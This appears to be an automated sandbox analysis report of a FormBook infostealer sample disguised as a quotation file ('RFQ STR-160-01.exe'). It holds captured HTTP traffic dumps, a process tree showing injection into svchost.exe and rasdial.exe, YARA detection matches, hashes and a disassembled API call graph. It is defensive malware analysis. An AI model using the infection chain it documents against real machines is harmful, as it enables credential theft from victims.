            Sep 2, 2024 09:10:16.588531971 CEST1236INData Raw: 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f
            Data Ascii: right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-search-inline-css'>.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{h
            Sep 2, 2024 09:10:16.588546991 CEST1236INData Raw: 68 5f 5f 73 65 61 72 63 68 66 69 65 6c 64 2d 68 69 64 64 65 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
            Data Ascii: h__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-bloc
            Sep 2, 2024 09:10:16.593468904 CEST1236INData Raw: 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69
            Data Ascii: lock-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:right}</style><style id='wp-block-columns-inline-css'>.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:03:07:06
            Start date:02/09/2024
            Path:C:\Users\user\Desktop\RFQ STR-160-01.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\RFQ STR-160-01.exe"
            Imagebase:0x590000
            File size:1'229'312 bytes
            MD5 hash:33B97929531DCC9308FCE497CD75ED3B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:03:07:07
            Start date:02/09/2024
            Path:C:\Windows\SysWOW64\svchost.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\RFQ STR-160-01.exe"
            Imagebase:0xd90000
            File size:46'504 bytes
            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:03:07:34
            Start date:02/09/2024
            Path:C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe"
            Imagebase:0xcd0000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:03:07:36
            Start date:02/09/2024
            Path:C:\Windows\SysWOW64\rasdial.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\rasdial.exe"
            Imagebase:0xcf0000
            File size:19'456 bytes
            MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:false

            Target ID:9
            Start time:03:08:00
            Start date:02/09/2024
            Path:C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase:0x7ff728280000
            File size:676'768 bytes
            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:3.2%
              Dynamic/Decrypted Code Coverage:0.4%
              Signature Coverage:2.9%
              Total number of Nodes:2000
              Total number of Limit Nodes:53
              execution_graph 95134 5b03fb 95135 5b0407 CallCatchBlock 95134->95135 95163 5afeb1 95135->95163 95137 5b040e 95138 5b0561 95137->95138 95141 5b0438 95137->95141 95190 5b083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95138->95190 95140 5b0568 95191 5b4e52 28 API calls _abort 95140->95191 95152 5b0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95141->95152 95174 5c247d 95141->95174 95143 5b056e 95192 5b4e04 28 API calls _abort 95143->95192 95147 5b0576 95148 5b0457 95150 5b04d8 95182 5b0959 95150->95182 95152->95150 95186 5b4e1a 38 API calls 3 library calls 95152->95186 95154 5b04de 95155 5b04f3 95154->95155 95187 5b0992 GetModuleHandleW 95155->95187 95157 5b04fa 95157->95140 95158 5b04fe 95157->95158 95159 5b0507 95158->95159 95188 5b4df5 28 API calls _abort 95158->95188 95189 5b0040 13 API calls 2 library calls 95159->95189 95162 5b050f 95162->95148 95164 5afeba 95163->95164 95193 5b0698 IsProcessorFeaturePresent 95164->95193 95166 5afec6 95194 5b2c94 10 API calls 3 library calls 95166->95194 95168 5afecb 95169 5afecf 95168->95169 95195 5c2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95168->95195 95169->95137 95171 5afed8 95172 5afee6 95171->95172 95196 5b2cbd 8 API calls 3 library calls 95171->95196 95172->95137 95177 5c2494 95174->95177 95176 5b0451 95176->95148 95178 5c2421 95176->95178 95197 5b0a8c 95177->95197 95179 5c2450 95178->95179 95180 5b0a8c _ValidateLocalCookies 5 API calls 95179->95180 95181 5c2479 95180->95181 95181->95152 95205 5b2340 95182->95205 95185 5b097f 95185->95154 95186->95150 95187->95157 95188->95159 95189->95162 95190->95140 95191->95143 95192->95147 95193->95166 95194->95168 95195->95171 95196->95169 95198 5b0a97 IsProcessorFeaturePresent 95197->95198 95199 5b0a95 95197->95199 95201 5b0c5d 95198->95201 95199->95176 95204 5b0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95201->95204 95203 5b0d40 95203->95176 95204->95203 95206 5b096c GetStartupInfoW 95205->95206 95206->95185 95207 591098 95212 5942de 95207->95212 95211 5910a7 95233 59a961 95212->95233 95216 594342 95226 594378 95216->95226 95250 5993b2 95216->95250 95218 59436c 95254 5937a0 95218->95254 95219 59441b GetCurrentProcess IsWow64Process 95221 594437 95219->95221 95222 59444f LoadLibraryA 95221->95222 95223 5d3824 GetSystemInfo 95221->95223 95224 59449c GetSystemInfo 95222->95224 95225 594460 GetProcAddress 95222->95225 95229 594476 95224->95229 95225->95224 95228 594470 GetNativeSystemInfo 95225->95228 95226->95219 95227 5d37df 95226->95227 95228->95229 95230 59447a FreeLibrary 95229->95230 95231 59109d 95229->95231 95230->95231 95232 5b00a3 29 API calls __onexit 95231->95232 95232->95211 95258 5afe0b 95233->95258 95235 59a976 95268 5afddb 95235->95268 95237 5942f5 GetVersionExW 95238 596b57 95237->95238 95239 5d4ba1 95238->95239 95240 596b67 _wcslen 95238->95240 95241 5993b2 22 API calls 95239->95241 95243 596b7d 95240->95243 95244 596ba2 95240->95244 95242 5d4baa 95241->95242 95242->95242 95293 596f34 22 API calls 95243->95293 95245 5afddb 22 API calls 95244->95245 95248 596bae 95245->95248 95247 596b85 __fread_nolock 95247->95216 95249 5afe0b 22 API calls 95248->95249 95249->95247 95251 5993c9 __fread_nolock 95250->95251 95252 5993c0 95250->95252 95251->95218 95252->95251 95294 59aec9 95252->95294 95255 5937ae 95254->95255 95256 5993b2 22 API calls 95255->95256 95257 5937c2 95256->95257 95257->95226 95262 5afddb 95258->95262 95260 5afdfa 95260->95235 95262->95260 95264 5afdfc 95262->95264 95278 5bea0c 95262->95278 95285 5b4ead 7 API calls 2 library calls 95262->95285 95263 5b066d 95287 5b32a4 RaiseException 95263->95287 95264->95263 95286 5b32a4 RaiseException 95264->95286 95267 5b068a 95267->95235 95271 5afde0 95268->95271 95269 5bea0c ___std_exception_copy 21 API calls 95269->95271 95270 5afdfa 95270->95237 95271->95269 95271->95270 95274 5afdfc 95271->95274 95290 5b4ead 7 API calls 2 library calls 95271->95290 95273 5b066d 95292 5b32a4 RaiseException 95273->95292 95274->95273 95291 5b32a4 RaiseException 95274->95291 95277 5b068a 95277->95237 95283 5c3820 _free 95278->95283 95279 5c385e 95289 5bf2d9 20 API calls _free 95279->95289 95280 5c3849 RtlAllocateHeap 95282 5c385c 95280->95282 95280->95283 95282->95262 95283->95279 95283->95280 95288 5b4ead 7 API calls 2 library calls 95283->95288 95285->95262 95286->95263 95287->95267 95288->95283 95289->95282 95290->95271 95291->95273 95292->95277 95293->95247 95295 59aedc 95294->95295 95299 59aed9 __fread_nolock 95294->95299 95296 5afddb 22 API calls 95295->95296 95297 59aee7 95296->95297 95298 5afe0b 22 API calls 95297->95298 95298->95299 95299->95251 95300 59105b 95305 59344d 95300->95305 95302 59106a 95336 5b00a3 29 API calls __onexit 95302->95336 95304 591074 95306 59345d __wsopen_s 95305->95306 95307 59a961 22 API calls 95306->95307 95308 593513 95307->95308 95337 593a5a 95308->95337 95310 59351c 95344 593357 95310->95344 95317 59a961 22 API calls 95318 59354d 95317->95318 95365 59a6c3 95318->95365 95321 5d3176 RegQueryValueExW 95322 5d320c RegCloseKey 95321->95322 95323 5d3193 95321->95323 95325 593578 95322->95325 95333 5d321e _wcslen 95322->95333 95324 5afe0b 22 API calls 95323->95324 95326 5d31ac 95324->95326 95325->95302 95371 595722 95326->95371 95329 5d31d4 95330 596b57 22 API calls 95329->95330 95332 5d31ee messages 95330->95332 95331 594c6d 22 API calls 95331->95333 95332->95322 95333->95325 95333->95331 95335 59515f 22 API calls 95333->95335 95374 599cb3 95333->95374 95335->95333 95336->95304 95380 5d1f50 95337->95380 95340 599cb3 22 API calls 95341 593a8d 95340->95341 95382 593aa2 95341->95382 95343 593a97 95343->95310 95345 5d1f50 __wsopen_s 95344->95345 95346 593364 GetFullPathNameW 95345->95346 95347 593386 95346->95347 95348 596b57 22 API calls 95347->95348 95349 5933a4 95348->95349 95350 5933c6 95349->95350 95351 5933dd 95350->95351 95352 5d30bb 95350->95352 95392 5933ee 95351->95392 95354 5afddb 22 API calls 95352->95354 95356 5d30c5 _wcslen 95354->95356 95355 5933e8 95359 59515f 95355->95359 95357 5afe0b 22 API calls 95356->95357 95358 5d30fe __fread_nolock 95357->95358 95360 59516e 95359->95360 95364 59518f __fread_nolock 95359->95364 95362 5afe0b 22 API calls 95360->95362 95361 5afddb 22 API calls 95363 593544 95361->95363 95362->95364 95363->95317 95364->95361 95366 59a6dd 95365->95366 95370 593556 RegOpenKeyExW 95365->95370 95367 5afddb 22 API calls 95366->95367 95368 59a6e7 95367->95368 95369 5afe0b 22 API calls 95368->95369 95369->95370 95370->95321 95370->95325 95372 5afddb 22 API calls 95371->95372 95373 595734 RegQueryValueExW 95372->95373 95373->95329 95373->95332 95375 599cc2 _wcslen 95374->95375 95376 5afe0b 22 API calls 95375->95376 95377 599cea __fread_nolock 95376->95377 95378 5afddb 22 API calls 95377->95378 95379 599d00 95378->95379 95379->95333 95381 593a67 GetModuleFileNameW 95380->95381 95381->95340 95383 5d1f50 __wsopen_s 95382->95383 95384 593aaf GetFullPathNameW 95383->95384 95385 593ae9 95384->95385 95386 593ace 95384->95386 95388 59a6c3 22 API calls 95385->95388 95387 596b57 22 API calls 95386->95387 95389 593ada 95387->95389 95388->95389 95390 5937a0 22 API calls 95389->95390 95391 593ae6 95390->95391 95391->95343 95393 5933fe _wcslen 95392->95393 95394 5d311d 95393->95394 95395 593411 95393->95395 95396 5afddb 22 API calls 95394->95396 95402 59a587 95395->95402 95399 5d3127 95396->95399 95398 59341e __fread_nolock 95398->95355 95400 5afe0b 22 API calls 95399->95400 95401 5d3157 __fread_nolock 95400->95401 95403 59a59d 95402->95403 95406 59a598 __fread_nolock 95402->95406 95404 5df80f 95403->95404 95405 5afe0b 22 API calls 95403->95405 95405->95406 95406->95398 95407 5c90fa 95408 5c9107 95407->95408 95411 5c911f 95407->95411 95464 5bf2d9 20 API calls _free 95408->95464 95410 5c910c 95465 5c27ec 26 API calls pre_c_initialization 95410->95465 95413 5c917a 95411->95413 95421 5c9117 95411->95421 95466 5cfdc4 21 API calls 2 library calls 95411->95466 95427 5bd955 95413->95427 95416 5c9192 95434 5c8c32 95416->95434 95418 5c9199 95419 5bd955 __fread_nolock 26 API calls 95418->95419 95418->95421 95420 5c91c5 95419->95420 95420->95421 95422 5bd955 __fread_nolock 26 API calls 95420->95422 95423 5c91d3 95422->95423 95423->95421 95424 5bd955 __fread_nolock 26 API calls 95423->95424 95425 5c91e3 95424->95425 95426 5bd955 __fread_nolock 26 API calls 95425->95426 95426->95421 95428 5bd961 95427->95428 95429 5bd976 95427->95429 95467 5bf2d9 20 API calls _free 95428->95467 95429->95416 95431 5bd966 95468 5c27ec 26 API calls pre_c_initialization 95431->95468 95433 5bd971 95433->95416 95435 5c8c3e CallCatchBlock 95434->95435 95436 5c8c5e 95435->95436 95437 5c8c46 95435->95437 95438 5c8d24 95436->95438 95443 5c8c97 95436->95443 95535 5bf2c6 20 API calls _free 95437->95535 95542 5bf2c6 20 API calls _free 95438->95542 95440 5c8c4b 95536 5bf2d9 20 API calls _free 95440->95536 95446 5c8cbb 95443->95446 95447 5c8ca6 95443->95447 95444 5c8d29 95543 5bf2d9 20 API calls _free 95444->95543 95445 5c8c53 __fread_nolock 95445->95418 95469 5c5147 EnterCriticalSection 95446->95469 95537 5bf2c6 20 API calls _free 95447->95537 95451 5c8cab 95538 5bf2d9 20 API calls _free 95451->95538 95452 5c8cc1 95455 5c8cdd 95452->95455 95456 5c8cf2 95452->95456 95539 5bf2d9 20 API calls _free 95455->95539 95470 5c8d45 95456->95470 95459 5c8cb3 95544 5c27ec 26 API calls pre_c_initialization 95459->95544 95460 5c8ce2 95540 5bf2c6 20 API calls _free 95460->95540 95461 5c8ced 95541 5c8d1c LeaveCriticalSection __wsopen_s 95461->95541 95464->95410 95465->95421 95466->95413 95467->95431 95468->95433 95469->95452 95471 5c8d6f 95470->95471 95472 5c8d57 95470->95472 95474 5c90d9 95471->95474 95477 5c8db4 95471->95477 95554 5bf2c6 20 API calls _free 95472->95554 95576 5bf2c6 20 API calls _free 95474->95576 95475 5c8d5c 95555 5bf2d9 20 API calls _free 95475->95555 95480 5c8dbf 95477->95480 95481 5c8d64 95477->95481 95488 5c8def 95477->95488 95479 5c90de 95577 5bf2d9 20 API calls _free 95479->95577 95556 5bf2c6 20 API calls _free 95480->95556 95481->95461 95484 5c8dcc 95578 5c27ec 26 API calls pre_c_initialization 95484->95578 95485 5c8dc4 95557 5bf2d9 20 API calls _free 95485->95557 95489 5c8e08 95488->95489 95491 5c8e2e 95488->95491 95492 5c8e4a 95488->95492 95490 5c8e15 95489->95490 95489->95491 95545 5cf89b 95490->95545 95558 5bf2c6 20 API calls _free 95491->95558 95561 5c3820 21 API calls _free 95492->95561 95494 5c8e33 95559 5bf2d9 20 API calls _free 95494->95559 95498 5c8e61 95562 5c29c8 95498->95562 95499 5c8e3a 95560 5c27ec 26 API calls pre_c_initialization 95499->95560 95500 5c8fb3 95503 5c9029 95500->95503 95506 5c8fcc GetConsoleMode 95500->95506 95505 5c902d ReadFile 95503->95505 95504 5c8e6a 95507 5c29c8 _free 20 API calls 95504->95507 95508 5c9047 95505->95508 95509 5c90a1 GetLastError 95505->95509 95506->95503 95510 5c8fdd 95506->95510 95511 5c8e71 95507->95511 95508->95509 95514 5c901e 95508->95514 95512 5c90ae 95509->95512 95513 5c9005 95509->95513 95510->95505 95515 5c8fe3 ReadConsoleW 95510->95515 95516 5c8e7b 95511->95516 95517 5c8e96 95511->95517 95574 5bf2d9 20 API calls _free 95512->95574 95521 5c8e45 __fread_nolock 95513->95521 95571 5bf2a3 20 API calls 2 library calls 95513->95571 95514->95521 95529 5c906c 95514->95529 95530 5c9083 95514->95530 95515->95514 95520 5c8fff GetLastError 95515->95520 95568 5bf2d9 20 API calls _free 95516->95568 95570 5c9424 28 API calls __wsopen_s 95517->95570 95520->95513 95522 5c29c8 _free 20 API calls 95521->95522 95522->95481 95524 5c8e80 95569 5bf2c6 20 API calls _free 95524->95569 95525 5c90b3 95575 5bf2c6 20 API calls _free 95525->95575 95572 5c8a61 31 API calls 4 library calls 95529->95572 95530->95521 95532 5c909a 95530->95532 95573 5c88a1 29 API calls __wsopen_s 95532->95573 95534 5c909f 95534->95521 95535->95440 95536->95445 95537->95451 95538->95459 95539->95460 95540->95461 95541->95445 95542->95444 95543->95459 95544->95445 95546 5cf8a8 95545->95546 95548 5cf8b5 95545->95548 95579 5bf2d9 20 API calls _free 95546->95579 95550 5cf8c1 95548->95550 95580 5bf2d9 20 API calls _free 95548->95580 95549 5cf8ad 95549->95500 95550->95500 95552 5cf8e2 95581 5c27ec 26 API calls pre_c_initialization 95552->95581 95554->95475 95555->95481 95556->95485 95557->95484 95558->95494 95559->95499 95560->95521 95561->95498 95563 5c29fc _free 95562->95563 95564 5c29d3 RtlFreeHeap 95562->95564 95563->95504 95564->95563 95565 5c29e8 95564->95565 95582 5bf2d9 20 API calls _free 95565->95582 95567 5c29ee GetLastError 95567->95563 95568->95524 95569->95521 95570->95490 95571->95521 95572->95521 95573->95534 95574->95525 95575->95521 95576->95479 95577->95484 95578->95481 95579->95549 95580->95552 95581->95549 95582->95567 95583 59f7bf 95584 59f7d3 95583->95584 95585 59fcb6 95583->95585 95586 59fcc2 95584->95586 95588 5afddb 22 API calls 95584->95588 95677 59aceb 23 API calls messages 95585->95677 95678 59aceb 23 API calls messages 95586->95678 95590 59f7e5 95588->95590 95590->95586 95591 59f83e 95590->95591 95592 59fd3d 95590->95592 95609 59ed9d messages 95591->95609 95618 5a1310 95591->95618 95679 601155 22 API calls 95592->95679 95595 5e4beb 95687 60359c 82 API calls __wsopen_s 95595->95687 95596 5afddb 22 API calls 95612 59ec76 messages 95596->95612 95597 59fef7 95605 59a8c7 22 API calls 95597->95605 95597->95609 95600 5e4b0b 95685 60359c 82 API calls __wsopen_s 95600->95685 95601 59a8c7 22 API calls 95601->95612 95602 5e4600 95602->95609 95680 59a8c7 95602->95680 95605->95609 95608 5b0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95608->95612 95610 59fbe3 95610->95609 95614 5e4bdc 95610->95614 95617 59f3ae messages 95610->95617 95611 59a961 22 API calls 95611->95612 95612->95595 95612->95596 95612->95597 95612->95600 95612->95601 95612->95602 95612->95608 95612->95609 95612->95610 95612->95611 95613 5b00a3 29 API calls pre_c_initialization 95612->95613 95616 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95612->95616 95612->95617 95675 5a01e0 256 API calls 2 library calls 95612->95675 95676 5a06a0 41 API calls messages 95612->95676 95613->95612 95686 60359c 82 API calls __wsopen_s 95614->95686 95616->95612 95617->95609 95684 60359c 82 API calls __wsopen_s 95617->95684 95619 5a17b0 95618->95619 95620 5a1376 95618->95620 95926 5b0242 5 API calls __Init_thread_wait 95619->95926 95621 5a1390 95620->95621 95622 5e6331 95620->95622 95688 5a1940 95621->95688 95931 61709c 256 API calls 95622->95931 95626 5a17ba 95630 599cb3 22 API calls 95626->95630 95632 5a17fb 95626->95632 95628 5e633d 95628->95612 95629 5a1940 9 API calls 95631 5a13b6 95629->95631 95638 5a17d4 95630->95638 95631->95632 95634 5a13ec 95631->95634 95633 5e6346 95632->95633 95635 5a182c 95632->95635 95932 60359c 82 API calls __wsopen_s 95633->95932 95634->95633 95658 5a1408 __fread_nolock 95634->95658 95928 59aceb 23 API calls messages 95635->95928 95927 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95638->95927 95640 5a1839 95929 5ad217 256 API calls 95640->95929 95642 5e636e 95933 60359c 82 API calls __wsopen_s 95642->95933 95643 5a152f 95645 5a153c 95643->95645 95646 5e63d1 95643->95646 95648 5a1940 9 API calls 95645->95648 95935 615745 54 API calls _wcslen 95646->95935 95649 5a1549 95648->95649 95653 5e64fa 95649->95653 95655 5a1940 9 API calls 95649->95655 95650 5afddb 22 API calls 95650->95658 95651 5a1872 95930 5afaeb 23 API calls 95651->95930 95652 5afe0b 22 API calls 95652->95658 95662 5e6369 95653->95662 95936 60359c 82 API calls __wsopen_s 95653->95936 95660 5a1563 95655->95660 95658->95640 95658->95642 95658->95643 95658->95650 95658->95652 95659 5e63b2 95658->95659 95658->95662 95698 59ec40 95658->95698 95934 60359c 82 API calls __wsopen_s 95659->95934 95660->95653 95663 59a8c7 22 API calls 95660->95663 95665 5a15c7 messages 95660->95665 95662->95612 95663->95665 95664 5a1940 9 API calls 95664->95665 95665->95651 95665->95653 95665->95662 95665->95664 95667 5a167b messages 95665->95667 95722 5aeffa 95665->95722 95779 60744a 95665->95779 95836 5fd4ce 95665->95836 95839 606ef1 95665->95839 95919 61958b 95665->95919 95922 61959f 95665->95922 95666 5a171d 95666->95612 95667->95666 95925 5ace17 22 API calls messages 95667->95925 95675->95612 95676->95612 95677->95586 95678->95592 95679->95609 95681 59a8ea __fread_nolock 95680->95681 95682 59a8db 95680->95682 95681->95609 95682->95681 95683 5afe0b 22 API calls 95682->95683 95683->95681 95684->95609 95685->95609 95686->95595 95687->95609 95689 5a1981 95688->95689 95693 5a195d 95688->95693 95937 5b0242 5 API calls __Init_thread_wait 95689->95937 95691 5a198b 95691->95693 95938 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95691->95938 95697 5a13a0 95693->95697 95939 5b0242 5 API calls __Init_thread_wait 95693->95939 95694 5a8727 95694->95697 95940 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95694->95940 95697->95629 95719 59ec76 messages 95698->95719 95699 5b0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95699->95719 95700 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95700->95719 95701 59fef7 95709 59a8c7 22 API calls 95701->95709 95715 59ed9d messages 95701->95715 95703 5afddb 22 API calls 95703->95719 95705 5e4b0b 95944 60359c 82 API calls __wsopen_s 95705->95944 95706 5e4600 95712 59a8c7 22 API calls 95706->95712 95706->95715 95709->95715 95711 59a8c7 22 API calls 95711->95719 95712->95715 95713 59fbe3 95713->95715 95716 5e4bdc 95713->95716 95721 59f3ae messages 95713->95721 95714 59a961 22 API calls 95714->95719 95715->95658 95945 60359c 82 API calls __wsopen_s 95716->95945 95717 5b00a3 29 API calls pre_c_initialization 95717->95719 95719->95699 95719->95700 95719->95701 95719->95703 95719->95705 95719->95706 95719->95711 95719->95713 95719->95714 95719->95715 95719->95717 95720 5e4beb 95719->95720 95719->95721 95941 5a01e0 256 API calls 2 library calls 95719->95941 95942 5a06a0 41 API calls messages 95719->95942 95946 60359c 82 API calls __wsopen_s 95720->95946 95721->95715 95943 60359c 82 API calls __wsopen_s 95721->95943 95947 599c6e 95722->95947 95725 5afddb 22 API calls 95727 5af02b 95725->95727 95728 5afe0b 22 API calls 95727->95728 95731 5af03c 95728->95731 95729 5ef0a8 95730 5af0a4 95729->95730 96045 609caa 39 API calls 95729->96045 95738 5af0b1 95730->95738 95985 59b567 95730->95985 95990 596246 95731->95990 95735 59a961 22 API calls 95737 5af04f 95735->95737 95736 5ef10a 95736->95738 95739 5ef112 95736->95739 95741 596246 CloseHandle 95737->95741 95961 5afa5b 95738->95961 95740 59b567 39 API calls 95739->95740 95746 5af0b8 95740->95746 95743 5af056 95741->95743 95994 597510 95743->95994 95749 5ef127 95746->95749 95750 5af0d3 95746->95750 95747 596246 CloseHandle 95748 5af06c 95747->95748 96017 595745 95748->96017 95753 5afe0b 22 API calls 95749->95753 95966 596270 95750->95966 95756 5ef12c 95753->95756 95760 5ef140 95756->95760 96046 5af866 ReadFile SetFilePointerEx 95756->96046 95757 5ef0a0 96044 596216 CloseHandle messages 95757->96044 95758 5af085 96025 5953de 95758->96025 95768 5ef144 __fread_nolock 95760->95768 96047 600e85 22 API calls ___scrt_fastfail 95760->96047 95762 5af0ea 95762->95768 96041 5962b5 22 API calls 95762->96041 95767 5af093 96040 5953c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95767->96040 95770 5af0fe 95773 5af138 95770->95773 95774 596246 CloseHandle 95770->95774 95771 5ef069 96043 5fccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95771->96043 95772 5af09a 95772->95730 95772->95771 95773->95665 95776 5af12c 95774->95776 95776->95773 96042 596216 CloseHandle messages 95776->96042 95777 5ef080 95777->95730 95780 607469 95779->95780 95781 607474 95779->95781 95782 59b567 39 API calls 95780->95782 95784 59a961 22 API calls 95781->95784 95821 607554 95781->95821 95782->95781 95783 5afddb 22 API calls 95785 607587 95783->95785 95786 607495 95784->95786 95787 5afe0b 22 API calls 95785->95787 95788 59a961 22 API calls 95786->95788 95789 607598 95787->95789 95790 60749e 95788->95790 95791 596246 CloseHandle 95789->95791 95792 597510 53 API calls 95790->95792 95793 6075a3 95791->95793 95795 6074aa 95792->95795 95794 59a961 22 API calls 95793->95794 95796 6075ab 95794->95796 96104 59525f 95795->96104 95798 596246 CloseHandle 95796->95798 95800 6075b2 95798->95800 95799 6074bf 96146 596350 95799->96146 95802 597510 53 API calls 95800->95802 95805 6075be 95802->95805 95804 60754a 95808 59b567 39 API calls 95804->95808 95807 596246 CloseHandle 95805->95807 95806 5fd4ce 4 API calls 95809 607502 95806->95809 95810 6075c8 95807->95810 95808->95821 95809->95804 95811 607506 95809->95811 95813 595745 5 API calls 95810->95813 95812 599cb3 22 API calls 95811->95812 95814 607513 95812->95814 95815 6075e2 95813->95815 96155 5fd2c1 26 API calls 95814->96155 95817 6075ea 95815->95817 95818 6076de GetLastError 95815->95818 95822 5953de 27 API calls 95817->95822 95819 6076f7 95818->95819 96159 596216 CloseHandle messages 95819->96159 95821->95783 95834 6076a4 95821->95834 95823 6075f8 95822->95823 96156 5953c7 SetFilePointerEx SetFilePointerEx 